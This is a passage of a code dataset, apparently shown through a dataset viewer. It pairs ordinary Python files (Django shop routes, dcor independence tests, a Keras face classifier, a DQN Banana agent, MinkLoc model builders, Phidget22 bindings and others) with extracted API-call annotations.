16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (16558, 16574), True, 'import seaborn as sns\\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\\n', (16607, 16726), True, 'import seaborn as sns\\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\\n', (17654, 17685), True, 'import numpy as np\\n'), ((17992, 18017), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\\n', (18004, 18017), True, 'import numpy as np\\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\\n', (18178, 18208), True, 'import numpy as np\\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\\n', (18232, 18261), True, 'import numpy as np\\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\\n', (18284, 
18314), True, 'import numpy as np\\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (18325, 18341), True, 'import seaborn as sns\\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\\n', (18438, 18570), True, 'import seaborn as sns\\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\\n', (21282, 21296), True, 'import seaborn as sns\\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '\"\"\"PRGn\"\"\"', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), \"(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\\n vmax=param_range)\\n\", (21359, 21443), True, 'import seaborn as sns\\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\\n'), ((21614, 21634), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\\n', (23779, 23795), True, 'import seaborn as sns\\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\\n', (23825, 23846), True, 'import seaborn as sns\\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['\"\"\"ReLU output\"\"\"'], {}), \"('ReLU output')\\n\", (23859, 23874), True, 'import matplotlib.pyplot as plt\\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], 
{'batch_size': 'dr.batch_size', 'pool_width': \"job['target_pool']\"}), \"(test_seqs1, test_targets, test_targets_imag,\\n batch_size=dr.batch_size, pool_width=job['target_pool'])\\n\", (4698, 4804), False, 'import basenji\\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': \"job['target_pool']\"}), \"(test_seqs1, test_targets, batch_size=dr.batch_size,\\n pool_width=job['target_pool'])\\n\", (4892, 4979), False, 'import basenji\\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\\n', (5076, 5078), True, 'import tensorflow as tf\\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\\n', (10079, 10084), True, 'import numpy as np\\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\\n', (11135, 11146), True, 'import numpy as np\\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\\n', (16180, 16193), False, 'from sklearn import preprocessing\\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\\n', (17847, 17871), True, 'import numpy as np\\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\\n', (17947, 17960), False, 'from sklearn import preprocessing\\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\\n', (22088, 22101), True, 'import numpy as np\\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((5263, 5289), 'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\\n', (5273, 5289), True, 'import numpy as np\\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\\n', (8295, 8317), True, 'import numpy as np\\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\\n', (15298, 15350), False, 'from scipy.stats import spearmanr\\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\\n', (10288, 10299), True, 'import numpy as np\\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\\n', (10332, 10353), True, 'import numpy as np\\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\\n', (19983, 20012), True, 'import numpy as np\\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\\n', (20030, 20059), True, 'import numpy as np\\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\\n', (20179, 20206), True, 'import numpy as np\\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\\n', (20215, 20242), True, 'import numpy as np\\n'), ((10779, 10798), 
'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\\n', (10787, 10798), True, 'import numpy as np\\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\\n', (10962, 10974), True, 'import numpy as np\\n')]"}}},{"rowIdx":782,"cells":{"code":{"kind":"string","value":"from django.urls import path\n\nfrom . import views\napp_name = \"shop\"\n\nurlpatterns = [\n path('', views.HomePage.as_view(), name=\"home-page\"),\n path('shop/', views.ProductListView.as_view(), name=\"product-list\"),\n path('shop//', views.ProductListView.as_view(), name=\"product-list\"),\n path('shop/products//', views.ProductDetailView.as_view(), name=\"product-detail\"),\n path('cart/', views.cart_view, name=\"cart\"),\n path('cart/add//', views.add_product_to_order, name=\"add-product-to-cart\"),\n path('cart/add//json/', views.add_product_to_cart_json, name=\"add-product-to-cart-json\"),\n path('checkout/', views.CheckOut.as_view(), name=\"checkout\"),\n path('checkout//', views.CheckOut.as_view(), name=\"checkout\"),\n path('payment/', views.PaymentChoice.as_view(), name=\"payment-choice\"),\n path('payment/order//', views.MomoPayment.as_view(), name=\"momo-payment\"),\n path('payment/momo//confirm/', views.ConfirmMomoPayment.as_view(), name=\"confirm-momo-payment\"),\n path('orders/', views.OrderList.as_view(), name=\"order-list\"),\n path('orders//', views.OrderDetail.as_view(), name=\"order-detail\"),\n path('orders//items//', views.OrderItemDetail.as_view(), name=\"order-item-detail\"),\n]\n"},"apis":{"kind":"list like","value":["django.urls.path"],"string":"[\n \"django.urls.path\"\n]"},"extract_api":{"kind":"string","value":"[((406, 449), 'django.urls.path', 'path', (['\"\"\"cart/\"\"\"', 'views.cart_view'], {'name': '\"\"\"cart\"\"\"'}), \"('cart/', views.cart_view, name='cart')\\n\", (410, 449), False, 'from django.urls import path\\n'), ((455, 550), 'django.urls.path', 'path', (['\"\"\"cart/add//\"\"\"', 'views.add_product_to_order'], {'name': '\"\"\"add-product-to-cart\"\"\"'}), \"('cart/add//', views.add_product_to_order, name=\\n 'add-product-to-cart')\\n\", (459, 550), False, 'from django.urls import path\\n'), ((551, 659), 'django.urls.path', 'path', (['\"\"\"cart/add//json/\"\"\"', 'views.add_product_to_cart_json'], {'name': '\"\"\"add-product-to-cart-json\"\"\"'}), \"('cart/add//json/', views.add_product_to_cart_json,\\n name='add-product-to-cart-json')\\n\", (555, 659), False, 'from django.urls import path\\n')]"}}},{"rowIdx":783,"cells":{"code":{"kind":"string","value":"from hitori_generator import Generator\nfrom argparse import ArgumentParser\n\n\ndef generate(n: int, output_file: str) -> None:\n if n < 3 or n > 8:\n print(\"It isn't valid size\")\n exit(4)\n generator = Generator(n)\n data = generator.generate()\n lines = map(lambda x: ' '.join(map(str, x)), data)\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(lines))\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument('filename', type=str, help='Path to output file')\n p.add_argument('-s', \"--size\", type=int, default=3, help='Generate SxS field. size must be in [3, 8]. 
Default is 3')\n\n args = p.parse_args()\n generate(args.size, args.filename)\n\n\nif __name__ == '__main__':\n main()\n"},"apis":{"kind":"list like","value":["hitori_generator.Generator","argparse.ArgumentParser"],"string":"[\n \"hitori_generator.Generator\",\n \"argparse.ArgumentParser\"\n]"},"extract_api":{"kind":"string","value":"[((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\\n', (226, 229), False, 'from hitori_generator import Generator\\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\\n', (443, 445), False, 'from argparse import ArgumentParser\\n')]"}}},{"rowIdx":784,"cells":{"code":{"kind":"string","value":"from common.make_tx import make_swap_tx\nfrom sol.handle_simple import handle_unknown_detect_transfers\n\n\ndef handle_metaplex(exporter, txinfo):\n transfers_in, transfers_out, _ = txinfo.transfers_net\n\n if len(transfers_in) == 1 and len(transfers_out) == 1:\n sent_amount, sent_currency, _, _ = transfers_out[0]\n received_amount, received_currency, _, _ = transfers_in[0]\n\n row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)\n exporter.ingest_row(row)\n else:\n handle_unknown_detect_transfers(exporter, txinfo)\n\n\ndef is_nft_mint(txinfo):\n log_instructions = txinfo.log_instructions\n transfers_in, transfers_out, _ = txinfo.transfers_net\n\n if \"MintTo\" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0:\n return True\n elif (\"MintTo\" in log_instructions\n and len(transfers_out) == 1\n and len(transfers_in) == 1\n and transfers_in[0][0] == 1):\n return True\n else:\n return False\n\n\ndef handle_nft_mint(exporter, txinfo):\n transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net\n\n if len(transfers_in) == 1 and len(transfers_out) == 1:\n sent_amount, sent_currency, _, _ = transfers_out[0]\n received_amount, received_currency, _, _ = transfers_in[0]\n\n row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)\n exporter.ingest_row(row)\n return\n\n handle_unknown_detect_transfers(exporter, txinfo)\n"},"apis":{"kind":"list like","value":["common.make_tx.make_swap_tx","sol.handle_simple.handle_unknown_detect_transfers"],"string":"[\n \"common.make_tx.make_swap_tx\",\n \"sol.handle_simple.handle_unknown_detect_transfers\"\n]"},"extract_api":{"kind":"string","value":"[((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\\n received_currency)\\n', (415, 491), False, 'from common.make_tx import make_swap_tx\\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\\n received_currency)\\n', (1368, 1444), False, 'from common.make_tx import 
Dataset-viewer residue: rows 785–788 of a Python code-analysis dataset, each row holding a `code` string, a list of `apis`, and an `extract_api` field recording character offsets for every API call. The escaped JSON payload is collapsed here to a summary of the recoverable content; the span opens with the truncated tail of row 784 (ending in `make_swap_tx`). A minimal sketch of the permutation-test idea behind row 785 follows this list.

- Row 785: a dcor-style `independence` module implementing permutation tests of independence based on distance covariance (`distance_covariance_test`, `partial_distance_covariance_test`) and a high-dimension t-test (`distance_correlation_t_statistic`, `distance_correlation_t_test`), with doctest examples; listed API: `numpy.sqrt`.
- Row 786: a face/gender-classification demo — OpenCV Haar-cascade face detection, crop and resize to 48×48, a Keras CNN loaded with `load_model`, and labelled rectangles drawn back onto the image; listed APIs include `cv2.imread`, `cv2.CascadeClassifier`, `cv2.cvtColor`, `cv2.resize`, `numpy.expand_dims`, `keras.models.load_model`, `cv2.rectangle`, `chineseText.cv2ImgAddText`, `cv2.imshow`, `cv2.waitKey`, `cv2.destroyAllWindows`.
- Row 787: Django/REST-framework test utilities for a section-scheduler app — an `APITestCase` base class with permission/method/success request helpers and factory-based generation of courses, coordinators, mentors, sections, students and attendances; listed APIs include `rest_framework.test.APIClient`, the scheduler factories, and `random.seed`/`random.choice`/`random.randint`.
- Row 788: a fontTools-based `CurveCutter` — cached `calcCubicArcLength`/`splitCubicAtT` helpers, quadratic-to-cubic elevation, and arc-length subsegmenting that returns the point and tangent at a given length; listed APIs: `fontTools.misc.bezierTools.splitCubicAtT`, `fontTools.misc.bezierTools.calcCubicArcLength`, `fontTools.pens.recordingPen.RecordingPen`, `math.atan2`.
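As a rough, self-contained illustration of the permutation-test idea summarized for row 785 — a hypothetical NumPy-only sketch, not the dataset row's own dcor code (the names `dcov_permutation_test` and `_double_centered_dist` are assumptions introduced here):

```python
import numpy as np

def _double_centered_dist(x):
    # Pairwise Euclidean distances, double-centered so rows and columns have zero mean.
    d = np.linalg.norm(x[:, None, :] - x[None, :, :], axis=-1)
    return d - d.mean(axis=0, keepdims=True) - d.mean(axis=1, keepdims=True) + d.mean()

def dcov_permutation_test(x, y, num_resamples=199, seed=0):
    """Permutation test of independence based on the squared sample distance covariance."""
    rng = np.random.default_rng(seed)
    a, b = _double_centered_dist(x), _double_centered_dist(y)
    stat = (a * b).mean()  # biased estimator of the squared distance covariance
    count = 0
    for _ in range(num_resamples):
        perm = rng.permutation(len(x))
        # Jointly permuting rows and columns of b is equivalent to permuting the y sample.
        count += (a * b[np.ix_(perm, perm)]).mean() >= stat
    p_value = (count + 1) / (num_resamples + 1)
    return stat, p_value

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    x = rng.normal(size=(50, 3))
    y = x[:, :1] + 0.1 * rng.normal(size=(50, 1))  # y depends on x, so a small p-value is expected
    print(dcov_permutation_test(x, y))
```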
Rows 789–791 of the same dataset:

- Row 789: a Deep Q-Network training script for the Unity "Banana" navigation environment — 37-dimensional state, four discrete actions, episodic task solved at an average score of +13 over 100 episodes; the script opens the Unity environment, runs an epsilon-greedy training loop with epsilon decay, tracks a 100-episode score window, and saves a checkpoint once the target score is reached; listed APIs: `numpy.mean`, `collections.deque`, `dqn_agent.Agent`, `unityagents.UnityEnvironment`, `torch.cuda.is_available`.
- Row 790: a model factory for point-cloud place-recognition networks — builds a `MinkLoc`, `MinkLoc3D`, or EgoNN-style `MinkGL` model (Minkowski trunk plus global and local heads) from a `ModelParams` object; listed APIs: `models.minkgl.MinkHead`, `models.minkgl.MinkTrunk`, `models.minkgl.MinkGL`, `models.minkloc.MinkLoc`, `third_party.minkloc3d.minkloc.MinkLoc3D`.
- Row 791: the `Phidget` base class of the Phidget22 Python bindings — a ctypes wrapper around the C library that registers attach/detach/error/property-change callbacks (keeping the `CFUNCTYPE`/`WINFUNCTYPE` trampolines alive on the instance) and exposes getters/setters for channel, device class, serial number, hub port, server information and more; the row is cut off mid `extract_api`. A sketch of the ctypes callback pattern this wrapper depends on follows.
import PhidgetException\\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\\n', (8333, 8341), False, 'import ctypes\\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), '(_DeviceClass)\\n', (8614, 8628), False, 'import ctypes\\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\\n', (8922, 8940), False, 'import ctypes\\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\\n', (9230, 9241), False, 'import ctypes\\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\\n', (9520, 9534), False, 'import ctypes\\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\\n', (9884, 9898), False, 'import ctypes\\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\\n', (10149, 10162), False, 'import ctypes\\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 
'PhidgetException', (['result'], {}), '(result)\\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\\n', (10479, 10500), False, 'import ctypes\\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (10737, 10739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\\n', (11102, 11114), False, 'import ctypes\\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\\n', (11413, 11429), False, 'import ctypes\\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\\n', (11689, 11695), False, 'import ctypes\\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\\n', (11991, 12001), False, 'import ctypes\\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12321, 12329), False, 'from 
Phidget22.PhidgetException import PhidgetException\\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\\n', (12530, 12545), False, 'import ctypes\\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\\n', (12831, 12846), False, 'import ctypes\\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\\n', (13425, 13443), False, 'import ctypes\\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((13750, 13788), 'ctypes.byref', 